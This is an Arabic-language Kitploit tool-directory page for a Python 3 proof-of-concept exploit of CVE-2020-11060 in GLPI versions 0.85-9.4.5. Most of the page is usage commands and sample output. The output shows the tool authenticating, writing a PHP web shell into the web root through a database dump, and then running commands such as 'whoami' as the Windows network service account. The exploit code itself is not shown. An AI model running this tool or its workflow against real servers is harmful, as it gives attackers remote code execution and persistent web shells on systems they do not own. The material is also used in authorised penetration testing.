Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2020-11060-poc — Python3 POC لـ CVE 2020-11060 | Kitploit
أدوات/GitHubGitHub/0xdreadnaught/cve-2020-11060-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHub0xdreadnaught/cve-2020-11060-poc

cve-2020-11060-poc

Python3 POC لـ CVE 2020-11060

عرض المستودع
81منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-11060

هذا النص البرمجي هو استغلال مبني على Python 3.x للثغرة CVE-2020-11060 في إصدارات GLPI 0.85-9.4.5.

التطبيق الأصلي: 0xdreadnaught

إعادة هيكلة لـ Python 3: n3rada

PoC الأصلي في ExploitDB أصبح الآن مهملاً لأنه استخدم Python 2.x. تم تقديم الإصدار الجديد، وسيتم إضافة رابط هنا عند قبوله إذا حدث ذلك. البحث الأصلي حول الثغرة المستخدم لبناء هذه الـ PoCs تم إجراؤه بواسطة AlmondOffSec، ويمكن العثور عليه هنا.

الاستخدام

root@kitploit:~
python3 CVE-2020-11060.py --url 'http://<target URL>' --user <'user'> --password <'password'> --platform <win/nix> --offset <#>

مثال على الإخراج

root@kitploit:~
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne' --user 'glpi_adm' --password 'Amvfd6565/432' --platform 'win' --offset 312

[+] GLPI Browser targeting 'http://glpi.vul.ne' ('windows') with following credentials: 'glpi_adm':'Amvfd6565/432'.
[+] الهدف قيد التشغيل ويستجيب.
[+] المستخدم 'glpi_adm' مسجل الدخول.
------------------------- المحاولة رقم 1 -------------------------
[*] جاري مسح الشبكات...
        حذف معرف الشبكة: 2413
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
        ESSID الجديد: RCEe
[+] اسم الشيل الحالي: bQznfdTr.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\bQznfdTr.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/bQznfdTr.php
[+] حجم الشيل: 265
------------------------- المحاولة رقم 2 -------------------------
[*] جاري مسح الشبكات...
        حذف معرف الشبكة: 2414
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
        ESSID الجديد: RCEee
[+] اسم الشيل الحالي: HdqrmKtR.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\HdqrmKtR.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/HdqrmKtR.php
[+] حجم الشيل: 13882
------------------------- المحاولة رقم 3 -------------------------
[*] جاري مسح الشبكات...
        حذف معرف الشبكة: 2415
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
        ESSID الجديد: RCEeee
[+] اسم الشيل الحالي: dwmfIJgN.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\dwmfIJgN.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/dwmfIJgN.php
[+] حجم الشيل: 13885
------------------------- المحاولة رقم 4 -------------------------
[*] جاري مسح الشبكات...
        حذف معرف الشبكة: 2416
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
        ESSID الجديد: RCEeeee
[+] اسم الشيل الحالي: KmGsYHBw.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\KmGsYHBw.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/KmGsYHBw.php
[+] حجم الشيل: 8369
------------------------------------------------------------------
[+] تم العثور على RCE بعد 4 محاولات!
[+] يمكنك تنفيذ الأوامر عن بُعد كـ: nt authority\network service@WIN03
[+] قم بتشغيل هذه الأداة مرة أخرى مع الأمر المطلوب لحقنه:
        python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'desired_command_here'

بعد ذلك، يمكنك تنفيذ أمر بحرية مثل:

root@kitploit:~
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'whoami'

وسيعيد:

root@kitploit:~
[*] تم استلام الرد من 'http://glpi.vul.ne/sound/KmGsYHBw.php':

nt authority\network service
تنزيل الأداة